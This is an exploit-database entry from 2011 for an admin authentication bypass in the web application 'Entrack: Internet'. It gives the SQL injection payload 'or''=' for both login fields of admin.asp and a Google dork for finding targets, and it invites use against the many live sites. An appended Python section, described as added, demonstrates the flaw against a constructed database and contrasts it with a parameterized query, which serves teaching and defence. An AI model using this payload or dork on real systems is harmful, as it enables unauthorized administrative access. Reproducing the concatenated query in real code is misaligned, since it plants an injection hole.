Entrack: Internet Admin Auth Bypass



EKU-ID: 562 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-06-21 Verified: Verified


# Exploit Title: Entrack: Internet Admin Auth Bypass
# Date: 17/6/2011
# Author: Angel Injection & Noor Al-Iraqia
# Home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: n/a
# Version: n/a
# Category: webapps
# Google dork: "Entrack: Internet"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How to exploit

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password :  'or''='

And enjoy
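
The login behaviour described above, as an added example that is not part of the original advisory or Entrack's code. It assumes (the page does not show the application's source) that admin.asp concatenates the two form fields into its SQL login query, and shows why the posted value makes the WHERE clause always true and how a parameterized lookup rejects it. Table, column and function names and the sample account are constructed.

```python
import hmac
import sqlite3

PAYLOAD = "'or''='"  # value the advisory enters in both login fields

def make_db():
    # Constructed sample data: a single admin row in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-S3cret')")
    return db

def build_vulnerable_sql(username, password):
    # Assumed query shape (hypothetical): form input is pasted between quotes.
    return ("SELECT username FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(db, username, password):
    # Any returned row is treated as a successful login.
    return db.execute(build_vulnerable_sql(username, password)).fetchone() is not None

def login_parameterized(db, username, password):
    # Input is bound as data, so quotes in it cannot change the query structure.
    row = db.execute("SELECT password FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; a production system would compare password hashes.
    return hmac.compare_digest(row[0].encode(), password.encode())

if __name__ == "__main__":
    db = make_db()
    # The quotes close the string literals, leaving a trailing OR ''='' (always true).
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("concatenated query accepts payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized query accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("parameterized query accepts real login:",
          login_parameterized(db, "admin", "constructed-S3cret"))
```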


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team